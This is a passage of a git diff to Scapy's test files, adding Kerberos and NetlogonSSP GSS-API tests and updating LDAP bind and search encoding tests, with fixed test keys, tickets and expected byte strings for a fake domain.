d\xe9\x11\x12K\xe5\x08\xa4\x82\x0180\x82\x014\xa0\x03\x02\x01\x12\xa2\x82\x01+\x04\x82\x01\'\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xef\x8d\x1fqW\xbf(\x97S+\rs_zM\xee\xa7\xc2\x1a\x8eh1\xa4\xcb\x06\xed\x8e\xe6\xc0\x9a\xf7\x93g5\xa5vp\x0e~G\xaf:\xbb<\xaa2\x0e\xf8+l \xc5\xdb\x17,\xa9\x99\xae\x80\r\x0f\xdd4\x92\xf1\xa3h\xc3)^*I\x92\x01\x9f\x06jW\x1a\xac=\xa4\xee\xfdo.\xc8\xd5\x9e\xeaNw\x9eu\xc3\x8b0\xc9_S\x1f\x19u\xbap\x1d\\\x88\x0eu\xbek\xa8}\n\xa0>\x85\xcc3\xed\x84\xadi\x0bB\x9ao\xd2lW\x7f+\x16\x1cxU\x99\x90\x92\xfd\x06\x11ij\xdc\xb5\xc6F\xc0P\xf6\\\xbe\x04I\x9aP\x11\xa5\xff=\xd7\x95\'\xaa\x0e\x1c\xbf\xc4O\xf4D\xc8\xb1Fv\x8f\xff\xde*\'\x17\xe1\xcf\x06\xeb\xd7s\xfc\xa4\x0c6\x87\x9f\xa7\x9b\xe6\xddmMb\xc3\xc8\xcfH\x1a\x1a`\x08\t\x83\x01\x01\x81R\x8d\xda\xd7\xebZ\x83\x8eO\x14\x8e\xf7\x1fc\xb0KcC\xba\xf3\x04+L\xe3\xc1\xf5\xadF\xda\xfa\xe6q\xe0\x90&\x93\xffd\x16KRB_AP_REP) + +with KrbRandomPatcher(): + srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + +assert negResult == 0 +assert isinstance(tok, SPNEGO_negToken) +tok = SPNEGO_negToken(bytes(tok)) +assert isinstance(tok.token, SPNEGO_negTokenResp) +assert tok.token.negResult == 0 +assert tok.token.supportedMech.oid == '1.2.840.48018.1.2.2' +assert isinstance(tok.token.responseToken, SPNEGO_Token) +assert tok.token.mechListMIC is not None + +ap_rep = tok.token.responseToken.value.root +assert isinstance(ap_rep, KRB_AP_REP) + +apreppart = ap_rep.encPart.decrypt(clicontext.ssp.KEY) +assert apreppart.ctime == "20240305165255Z" +assert apreppart.subkey.keyvalue == b"0000000000000000" +assert apreppart.subkey.keytype == 17 + +# Hardcode (yes this will probably require updating this test) +bytes(tok) +assert bytes(tok) == b'\xa1\x81\xa90\x81\xa6\xa0\x03\n\x01\x00\xa1\x0b\x06\t*\x86H\x82\xf7\x12\x01\x02\x02\xa2r\x04pon0l\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2`0^\xa0\x03\x02\x01\x12\xa2W\x04UaS\xeck\xcc\xad~\xfa^\x8d\xca\xbb\xc5\xd2/\xfd\xd3\xc3\xd9\xadN`\xd2;\xd7{\xb7\xf4p.\xa9\x9a\xb1}D\xc6|_t\n\r"M\xcd\xe2\t\xf0Ri\xc7\xcf\xb5\xefr9\xf0`iS7N\x06qKP\x06\xde\xc4\x18\xd5_\xcb\x0ct\x03k\xbc\xb9\x1adT\x03\xc1\x8bM\xa3\x1e\x04\x1c\x04\x04\x05\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x17F\x8al\x01c\x00\xcf4\x12oI' + += GSS_Init_sec_context (SPNEGO_negToken: KRB_AP_REP->OK) + +with KrbRandomPatcher(): + clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + +assert tok is None +assert negResult == 0 +assert clicontext.KrbSessionKey.key == srvcontext.KrbSessionKey.key +assert srvcontext.KrbSessionKey.key == b'0000000000000000' + += GSS_GetMICEx/GSS_VerifyMICEx: client sends a signed payload + +data_header = b"header" # signed but not encrypted +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted + +sig = client.GSS_GetMICEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +assert isinstance(sig, KRB_InnerToken) and sig.TOK_ID == b"\x04\x04" +assert sig.root.SND_SEQ == 0x7FFFFFFF//2 + 1 +assert bytes(sig) == b'\x04\x04\x04\xff\xff\xff\xff\xff\x00\x00\x00\x00@\x00\x00\x00\xfc\xc6\x86\xab\x85e\x18\xe8\x7f\xa81t' +server.GSS_VerifyMICEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data), + ], + sig +) + += GSS_GetMICEx/GSS_VerifyMICEx: server answers back + +sig = server.GSS_GetMICEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +assert isinstance(sig, KRB_InnerToken) and sig.TOK_ID == b"\x04\x04" +assert sig.root.SND_SEQ == 1 +assert bytes(sig) == b'\x04\x04\x05\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x01G\x81\x93\xb9\x92\xd0NvHH\xf6\x9c' +client.GSS_VerifyMICEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data), + ], + sig +) + += GSS_GetMICEx/GSS_VerifyMICEx: inject fault + +sig = client.GSS_GetMICEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +bad_data_header = data_header[:-3] + b"hey" +try: + server.GSS_VerifyMICEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=bad_data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data), + ], + sig + ) + assert False, "No error was reported, but there should have been one" +except ValueError: + pass + += Create client and server KerberosSSP (raw) + +client = KerberosSSP( + UPN="User1@domain.local", + SPN="cifs/dc1", + ST=KRB_Ticket(bytes.fromhex("618204a13082049da003020105a10e1b0c444f4d41494e2e4c4f43414ca2163014a003020103a10d300b1b04636966731b03646331a382046c30820468a003020112a10302010da282045a04820456671f6131b38ee6e682d62cb937b8b79c589753182f8dbcb14a91b031052a3c20f7b4c89bf9a41fe9960d112acc73f6bd6527dfe70700a3d3c2e72b4ba6705dfc040fd56f9d7cd60b580ebecec2bfb240baac619690dbd9301ed98cac037cfdff8ff96ac98358969f3532f9c6adc076d136a0ef96ebddef293df879bb42adfbf7670434f340ad673e0303ae186e1a510d7f50dbfee9ebab323c715d6b27a67ffec60dba9f7475e5dbf88eee1fcc95b7d467ab2b4ecef893a92a25c80b8480ac8c12bc10741523a2738a3d7c3d2c438235111188968486cab2934b32cad1b6b4b2cbf343b25d41ad463c0513cf21cf9f77f072f4a49d8042947064e3375a1ae76c355fd48d5fc163cf7f865af91bcb788cffe2e9e1a30a7e3f91be8fb55b0a8b8c0b600ef3e0e88feaad4fbf4fffe76c9302ee2acfa3b64ca28cd006fd4af9c27d2eb45e47e582b87e632aa23475caeb0e3e9d777339f5cb94abc19ebd080ffc78181bf81ff227182de422937675546633bd6ab688258a94d132fb590f8152d3f19bd55a1f336fb7c382140987ac2389134d8033882f923d3d5324a3e9f5437bd70f095e6bb00ee68d8f21912b19b27924c61b4e3bfe68411f9f220de8dace00e767b662313706730d4dc8539b309fc75e6ca4cae470cdf12cc3cfb191486e3e5eb8c80723b2b0473b07e4ea4d385487dd303df2db8d31f8c90d53c4adcf39ad78cf6c85fbb87b4c4ee531a42c2133df2b0362132374df995420e4b2a6d1e19d7879d518652d5101a316962b27b3884cb67d07572f96b9668ca42cca7311a7152ac7c6d492009192fa4a707989e43b2a10f19e535e7cf8afdaf63ce9a2a85ce1bd17d81cfe76d2ce5759a7fdbeff6fb279b8620bc2c5183b24be831c7ee157114f2700da210b36edb7bda7d91a32f7940bef431c76571cd44499f779cc4ebe829fb34eeaa1e442240d5962bdbcbc16c962974b546e9cee380dda49f651acc5c58acae4ad06d57e4b91d8c5557365e8ddda7ee9550963d70d4f56b44fc5a26e29b36cb21d11221825b5a2217cb1f1454d34d94a855cb860f2fe43681e3d302e7e124273dd18b04fddf660b8858e1e78d022cc03f467f3cf1a6e5df53bb831794542b1d08e38d3bfb0bf2e5ba6f75a0f77d56bf2924b144fff3c87ec7a57bff345ee8a4496676d38c9453c38e64521db2de6d6452aa8f3da1675134e8d90cbb0d274ce6189563fd9a56e56a800661e787b083950623035ddeeb2fb84f6fb2507f2c157e74e81a81970e11475ce926e393a55b06b77c444dbd23688e8a77c7f30337874fef787a187fcafd73a5a4837c8e3e60712308597ff72ea2edae69c9402ad7ae81abb3e9100f0c87b99b2564246bd56af8e6d0ecf2928e5151218f7e627c565e15540666f4f7c0e937c2d0e84782fcb1b535e596f6c4e0aed7c1d350e169d045f2eaaa4bb2f94cd149576f835e5eecb4418677d0444e51fafcbed2afac50b1d320bc223d2623601aee6df6a363a24294bfb3b00f2668dfc404e9fa17fe936e6620756a6918f7de2de343f380fab83fde911124be508")), + KEY=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("4aad1c4c7b5bf02bfd061cfaebf0188d6c4f4642d569ca4ab536cb68adcb0e68")), +) +server = KerberosSSP( + SPN="cifs/dc1", + PASSWORD="Password1", + KEY=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("133614b285c1d76d4ec78d642e9c6f7451d7652cf6c5fe635af6e89050d42517")), +) + += GSS_Init_sec_context (KRB_AP_REQ) - DCE_STYLE + +with KrbRandomPatcher(): + clicontext, tok, negResult = client.GSS_Init_sec_context( + None, + req_flags=( + GSS_C_FLAGS.GSS_C_DCE_STYLE | + GSS_C_FLAGS.GSS_C_REPLAY_FLAG | + GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG | + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | + GSS_C_FLAGS.GSS_C_INTEG_FLAG + ) + ) + +assert negResult == 1 +assert isinstance(tok, KRB_AP_REQ) +ap_req = KRB_AP_REQ(bytes(tok)) +assert isinstance(ap_req, KRB_AP_REQ) +assert ap_req.apOptions == "001" +assert ap_req.ticket == client.ST + +auth = ap_req.authenticator.decrypt(client.KEY) +assert auth.cksum.cksumtype == 0x8003 +assert auth.cksum.checksum.Flags == ( + GSS_C_FLAGS.GSS_C_DCE_STYLE | + GSS_C_FLAGS.GSS_C_REPLAY_FLAG | + GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG | + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | + GSS_C_FLAGS.GSS_C_INTEG_FLAG +) +assert auth.cksum.checksum.Exts[0].sprintf("%type%") == 'GSS_EXTS_CHANNEL_BINDING' + +# Hardcode (yes this will probably require updating this test) +bytes(tok) +assert bytes(tok) == b'n\x82\x05\xf90\x82\x05\xf5\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0e\xa2\x04\x03\x02\x05 \xa3\x82\x04\xa5a\x82\x04\xa10\x82\x04\x9d\xa0\x03\x02\x01\x05\xa1\x0e\x1b\x0cDOMAIN.LOCAL\xa2\x160\x14\xa0\x03\x02\x01\x03\xa1\r0\x0b\x1b\x04cifs\x1b\x03dc1\xa3\x82\x04l0\x82\x04h\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\r\xa2\x82\x04Z\x04\x82\x04Vg\x1fa1\xb3\x8e\xe6\xe6\x82\xd6,\xb97\xb8\xb7\x9cX\x97S\x18/\x8d\xbc\xb1J\x91\xb01\x05*< \xf7\xb4\xc8\x9b\xf9\xa4\x1f\xe9\x96\r\x11*\xccs\xf6\xbde\'\xdf\xe7\x07\x00\xa3\xd3\xc2\xe7+K\xa6p]\xfc\x04\x0f\xd5o\x9d|\xd6\x0bX\x0e\xbe\xce\xc2\xbf\xb2@\xba\xaca\x96\x90\xdb\xd90\x1e\xd9\x8c\xac\x03|\xfd\xff\x8f\xf9j\xc9\x83X\x96\x9f52\xf9\xc6\xad\xc0v\xd16\xa0\xef\x96\xeb\xdd\xef)=\xf8y\xbbB\xad\xfb\xf7g\x044\xf3@\xadg>\x03\x03\xae\x18n\x1aQ\r\x7fP\xdb\xfe\xe9\xeb\xab2\x9dws9\xf5\xcb\x94\xab\xc1\x9e\xbd\x08\x0f\xfcx\x18\x1b\xf8\x1f\xf2\'\x18-\xe4"\x93vuTf3\xbdj\xb6\x88%\x8a\x94\xd12\xfbY\x0f\x81R\xd3\xf1\x9b\xd5Z\x1f3o\xb7\xc3\x82\x14\t\x87\xac#\x89\x13M\x803\x88/\x92==S$\xa3\xe9\xf5C{\xd7\x0f\t^k\xb0\x0e\xe6\x8d\x8f!\x91+\x19\xb2y$\xc6\x1bN;\xfehA\x1f\x9f"\r\xe8\xda\xce\x00\xe7g\xb6b17\x06s\rM\xc8S\x9b0\x9f\xc7^l\xa4\xca\xe4p\xcd\xf1,\xc3\xcf\xb1\x91Hn>^\xb8\xc8\x07#\xb2\xb0G;\x07\xe4\xeaM8T\x87\xdd0=\xf2\xdb\x8d1\xf8\xc9\rS\xc4\xad\xcf9\xadx\xcfl\x85\xfb\xb8{LN\xe51\xa4,!3\xdf+\x03b\x13#t\xdf\x99T \xe4\xb2\xa6\xd1\xe1\x9dxy\xd5\x18e-Q\x01\xa3\x16\x96+\'\xb3\x88L\xb6}\x07W/\x96\xb9f\x8c\xa4,\xcas\x11\xa7\x15*\xc7\xc6\xd4\x92\x00\x91\x92\xfaJpy\x89\xe4;*\x10\xf1\x9eS^|\xf8\xaf\xda\xf6<\xe9\xa2\xa8\\\xe1\xbd\x17\xd8\x1c\xfev\xd2\xceWY\xa7\xfd\xbe\xffo\xb2y\xb8b\x0b\xc2\xc5\x18;$\xbe\x83\x1c~\xe1W\x11O\'\x00\xda!\x0b6\xed\xb7\xbd\xa7\xd9\x1a2\xf7\x94\x0b\xefC\x1cvW\x1c\xd4D\x99\xf7y\xccN\xbe\x82\x9f\xb3N\xea\xa1\xe4B$\rYb\xbd\xbc\xbc\x16\xc9b\x97KTn\x9c\xee8\r\xdaI\xf6Q\xac\xc5\xc5\x8a\xca\xe4\xad\x06\xd5~K\x91\xd8\xc5Use\xe8\xdd\xda~\xe9U\tc\xd7\rOV\xb4O\xc5\xa2n)\xb3l\xb2\x1d\x11"\x18%\xb5\xa2!|\xb1\xf1EM4\xd9J\x85\\\xb8`\xf2\xfeCh\x1e=0.~\x12Bs\xdd\x18\xb0O\xdd\xf6`\xb8\x85\x8e\x1ex\xd0"\xcc\x03\xf4g\xf3\xcf\x1an]\xf5;\xb81yEB\xb1\xd0\x8e8\xd3\xbf\xb0\xbf.[\xa6\xf7Z\x0fw\xd5k\xf2\x92K\x14O\xff<\x87\xeczW\xbf\xf3E\xee\x8aD\x96gm8\xc9E<8\xe6E!\xdb-\xe6\xd6E*\xa8\xf3\xda\x16u\x13N\x8d\x90\xcb\xb0\xd2t\xcea\x89V?\xd9\xa5nV\xa8\x00f\x1ex{\x089Pb05\xdd\xee\xb2\xfb\x84\xf6\xfb%\x07\xf2\xc1W\xe7N\x81\xa8\x19p\xe1\x14u\xce\x92n9:U\xb0kw\xc4D\xdb\xd26\x88\xe8\xa7|\x7f03xt\xfe\xf7\x87\xa1\x87\xfc\xaf\xd7:ZH7\xc8\xe3\xe6\x07\x120\x85\x97\xffr\xea.\xda\xe6\x9c\x94\x02\xadz\xe8\x1a\xbb>\x91\x00\xf0\xc8{\x99\xb2VBF\xbdV\xaf\x8em\x0e\xcf)(\xe5\x15\x12\x18\xf7\xe6\'\xc5e\xe1U@foO|\x0e\x93|-\x0e\x84x/\xcb\x1bS^YolN\n\xed|\x1d5\x0e\x16\x9d\x04_.\xaa\xa4\xbb/\x94\xcd\x14\x95v\xf85\xe5\xee\xcbD\x18g}\x04D\xe5\x1f\xaf\xcb\xed*\xfa\xc5\x0b\x1d2\x0b\xc2#\xd2b6\x01\xae\xe6\xdfj6:$)K\xfb;\x00\xf2f\x8d\xfc@N\x9f\xa1\x7f\xe96\xe6b\x07V\xa6\x91\x8f}\xe2\xde4?8\x0f\xab\x83\xfd\xe9\x11\x12K\xe5\x08\xa4\x82\x0180\x82\x014\xa0\x03\x02\x01\x12\xa2\x82\x01+\x04\x82\x01\'\\>\t\xe4\x1d8,a(\x7f\x1e\xd2\x8dHH\x9c\xef\x8d\x1fqW\xbf(\x97S+\rs_zM\xee\xa7\xc2\x1a\x8eh1\xa4\xcb\x06\xed\x8e\xe6\xc0\x9a\xf7\x93g5\xa5vp\x0e~G\xaf:\xbb<\xaa2\x0e\xf8+l \xc5\xdb\x17,\xa9\x99\xae\x80\r\x0f\xdd4\x92\xf1\xa3h\xc3)^*I\x92\x01\x9f\x06jW\x1a\xac\x02r\x05\n`d\xd1\xda\xf5i\x9e\x04e\xa9\\,2\xf9\xa55\x16m\x92\x7fI\xe6\x81\x98\xe5V\xa1i\x17\xf0\x10\xf9\x16\x92\x81\x95mJ\xe3\xcc\x0f\x83gW\xca\xc5l\xc2~\x1fFmt~\x81\xd5%{\x87\xe1!\x15\xc4o\x163,\x8eg\xd4\xc5\xdc\xd7\x11at\x87v\x13j\xd0/\x07z/\xee\xd6\xd8b\x0b(\xae*\xd7\x87\xe3\xb7\x1b\xf8d\xd8\xbc\xadL7\x18a0o`\xa7\xd1Q\xe8\xf3\x9a\xf1\x95\xf2\xec\x06\xc0v\xba\x81\xc4\xbc7@8\x08\xd9\xa7{~\x8fz\xeeE\xdc\xc9\x81"\xb6b\x872=.\x19$KP\xcd\xfd\x85\x861@c\x05,\xa9\x98\xe9\x8e\x84A\x9f\n#&\xb2\xf4"\xa5O\x86\xc9\x93\xcb\x97\x0e\x18C\xf5\x00^\xe8De\x94|\xbaf' + += GSS_Accept_sec_context (KRB_AP_REQ->KRB_AP_REP) - DCE_STYLE + +with KrbRandomPatcher(): + srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + +assert negResult == 1 +assert isinstance(tok, KRB_AP_REP) +ap_rep = KRB_AP_REP(bytes(tok)) + +apreppart = ap_rep.encPart.decrypt(client.KEY) +assert apreppart.ctime == "20240305165255Z" +assert apreppart.subkey.keyvalue == b"0000000000000000" +assert apreppart.subkey.keytype == 17 + +# Hardcode (yes this will probably require updating this test) +bytes(tok) +assert bytes(tok) == b'on0l\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2`0^\xa0\x03\x02\x01\x12\xa2W\x04UaS\xeck\xcc\xad~\xfa^\x8d\xca\xbb\xc5\xd2/\xfd\xd3\xc3\xd9\xadN`\xd2;\xd7{\xb7\xf4p.\xa9\x9a\xb1}D\xc6|_t\n\r"M\xcd\xe2\t\xf0Ri\xc7\xcf\xb5\xefr9\xf0`iS7N\x06qKP\x06\xde\xc4\x18\xd5_\xcb\x0ct\x03k\xbc\xb9\x1adT\x03\xc1\x8bM' + += GSS_Init_sec_context (SPNEGO_negToken: KRB_AP_REP->KRB_AP_REP) - DCE_STYLE + +with KrbRandomPatcher(): + clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + +assert negResult == 0 +assert isinstance(tok, KRB_AP_REP) +ap_rep = KRB_AP_REP(bytes(tok)) + +apreppart = ap_rep.encPart.decrypt(client.KEY) +assert apreppart.ctime == "20240305165255Z" + +# Hardcode (yes this will probably require updating this test) +bytes(tok) +assert bytes(tok) == b'oQ0O\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0f\xa2C0A\xa0\x03\x02\x01\x12\xa2:\x048aS\xeck\xcc\xad~\xfa^\x8d\xca\xbb\xc5\xd2/\xfd.e\xec\xef\xce\x91\x1d\x99\xd8\xcd2\x01\x0fA\xe4\xde\x12\xf4\xbc>\xe1\x98T\xc4\x82\xb5w\x1arZb\xdb\x9b-+\xf3\xfa\x0b\xdeD' + += GSS_Accept_sec_context (KRB_AP_REP->OK) - DCE_STYLE + +with KrbRandomPatcher(): + srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok) + +assert negResult == 0 +assert tok is None diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index e586f4f0dc8..91e5f5a7ade 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -21,13 +21,13 @@ from scapy.layers.ntlm import * pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00x\xb2\x94@\x00\x80\x06\xd1\xf7\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x85\xc3U/c\x9fP\x18 \x12U\x96\x00\x000B\x02\x01\x0c`=\x02\x01\x03\x04\x00\xa36\x04\nGSS-SPNEGO\x04(NTLMSSP\x00\x01\x00\x00\x00\xb7\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f') assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) -assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) +assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_Authentication_SaslCredentials) ntlm = pkt[LDAP].protocolOp.authentication.credentials assert isinstance(ntlm, NTLM_NEGOTIATE) pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x01\xce\xb2\x95@\x00\x80\x06\xd0\xa0\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x86\x13U/d9P\x18 \x11\x11\x93\x00\x000\x82\x01\x9c\x02\x01\r`\x82\x01\x95\x02\x01\x03\x04\x00\xa3\x82\x01\x8c\x04\nGSS-SPNEGO\x04\x82\x01|NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00h\x00\x00\x00\xec\x00\xec\x00\x80\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x08\x00\x08\x00X\x00\x00\x00\x08\x00\x08\x00`\x00\x00\x00\x10\x00\x10\x00l\x01\x00\x005\x82\x88\xe2\n\x00aJ\x00\x00\x00\x0f\xa0\xcd\xd2\xaa\xfdQc\xacs\\\xf6\xa3\x07\n\x05$t\x00o\x00t\x00o\x00W\x00I\x00N\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\xd1\x8e\xd6w\x99\t\rdQ\x05\xa6iI\xd1\x19\x01\x01\x00\x00\x00\x00\x00\x00\xb8}\x868\xe1\xc5\xd7\x01?\x84\xe3V\xcf&/\xf0\x00\x00\x00\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xb8}\x868\xe1\xc5\xd7\x01\x06\x00\x04\x00\x02\x00\x00\x00\x08\x000\x000\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00 \x00\x00\x0b\xd3s!~\x13\x9a\xcc\xc77\xf4\xcc\x90b\xcc|\x8f\xd2\xe8\xb85cw\x89#\x0e\x8bd\xfcPYf\n\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00(\x00l\x00d\x00a\x00p\x00/\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x002\x002\x00.\x001\x005\x006\x00\x00\x00\x00\x00\x00\x00\x00\x00rD\x8c\x9d\x1b\xa6\xa9\x1a7\xd3\x96\x0f\xbe\xab\xecC') assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) -assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) +assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_Authentication_SaslCredentials) ntlm = pkt[LDAP].protocolOp.authentication.credentials assert isinstance(ntlm, NTLM_AUTHENTICATE_V2) assert ntlm.Payload[0] == ('UserName', 'toto') @@ -35,9 +35,9 @@ assert ntlm.Payload[1] == ('Workstation', 'WIN2') assert isinstance(ntlm.Payload[3][1], NTLMv2_RESPONSE) assert ntlm.Payload[3][1].AvPairs[8].Value == 'ldap/192.168.122.156' -pkt = LDAP_BindRequest(bind_name="user", authentication=ASN1_LDAP_Authentication_simple("password")) -assert bytes(pkt) == b'`\x13\x02\x01\x02\x04\x04user\x80\x08password' -assert LDAP_BindRequest(b'`\x13\x02\x01\x02\x04\x04user\x80\x08password').authentication.val == b"password" +pkt = LDAP_BindRequest(bind_name="user", authentication=LDAP_Authentication_simple("password")) +assert bytes(pkt) == b'`\x13\x02\x01\x03\x04\x04user\x80\x08password' +assert LDAP_BindRequest(b'`\x13\x02\x01\x03\x04\x04user\x80\x08password').authentication.val == b"password" = LDAP_BindResponse @@ -54,7 +54,7 @@ assert pkt[LDAP].protocolOp.diagnosticMessage.val == b'8009030C: LdapErr: DSID-0 = LDAP_SearchRequest -pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00[\xb2\x8e@\x00\x80\x06\xd2\x1a\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x84VU/V:P\x18 \x14Q<\x00\x000%\x02\x01\x08c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x00') +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00[\xb2\x8e@\x00\x80\x06\xd2\x1a\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x84VU/V:P\x18 \x14Q<\x00\x000%\x02\x01\x08c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x00') assert isinstance(pkt[LDAP].protocolOp, LDAP_SearchRequest) assert pkt[LDAP].protocolOp.baseObject == b"" assert pkt[LDAP].protocolOp.timeLimit == 0x64 @@ -124,7 +124,7 @@ assert raw(pkt2) == pkt.original = Test dissection of Microsoft LDAP -pkt = LDAP(b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00\x00') +pkt = LDAP(b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x84\x00\x00\x00\x00') assert pkt.protocolOp.filter.filter.present.val == b'objectClass' assert pkt.Controls is None @@ -133,10 +133,10 @@ assert pkt.Controls is None pkt = LDAP(protocolOp=LDAP_SearchRequest(filter=LDAP_Filter(filter=LDAP_FilterPresent(present=ASN1_STRING(b'objectClass'))), baseObject=ASN1_STRING(b''), scope=ASN1_ENUMERATED(0), derefAliases=ASN1_ENUMERATED(0), sizeLimit=ASN1_INTEGER(0), timeLimit=ASN1_INTEGER(100), attrsOnly=ASN1_BOOLEAN(0)), messageID=ASN1_INTEGER(1), Controls=None) conf.ASN1_default_long_size = 4 -assert bytes(pkt) == b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00\x00' +assert bytes(pkt) == b'0\x84\x00\x00\x00-\x02\x01\x01c\x84\x00\x00\x00$\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x84\x00\x00\x00\x00' conf.ASN1_default_long_size = 0 -assert bytes(pkt) == b'0%\x02\x01\x01c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x00' +assert bytes(pkt) == b'0%\x02\x01\x01c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x00' = Craft new Microsoft LDAP Search Request with Controls @@ -163,7 +163,7 @@ pkt = LDAP( ] ) -assert bytes(pkt) == b'0\x84\x00\x00\x00\x9e\x02\x01\x02c\x84\x00\x00\x00o\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x01\x02\x01d\x01\x01\x00\xa7\x0bobjectClass0\x84\x00\x00\x00K\x04\x17rootDomainNamingContext\x04\x14defaultNamingContext\x04\x1aconfigurationNamingContext\xa0\x84\x00\x00\x00 0\x84\x00\x00\x00\x1a\x04\x161.2.840.113556.1.4.529\x04\x00' +assert bytes(pkt) == b'0\x84\x00\x00\x00\x9e\x02\x01\x02c\x84\x00\x00\x00o\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x01\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x84\x00\x00\x00K\x04\x17rootDomainNamingContext\x04\x14defaultNamingContext\x04\x1aconfigurationNamingContext\xa0\x84\x00\x00\x00 0\x84\x00\x00\x00\x1a\x04\x161.2.840.113556.1.4.529\x04\x00' conf.ASN1_default_long_size = 0 diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts index 3d326bc1727..88cb74d1e89 100644 --- a/test/scapy/layers/msnrpc.uts +++ b/test/scapy/layers/msnrpc.uts @@ -162,3 +162,141 @@ pkt = NetrServerAuthenticate3_Response( ) assert bytes(pkt) == bytes(auth_resp) + ++ GSS-API NetlogonSSP tests +~ mock + += Create randomness-mock context manager + +# mock the random to get consistency +import mock + +def fake_urandom(x): + # wow, impressive entropy + return b"0" * x + +_patches = [ + # 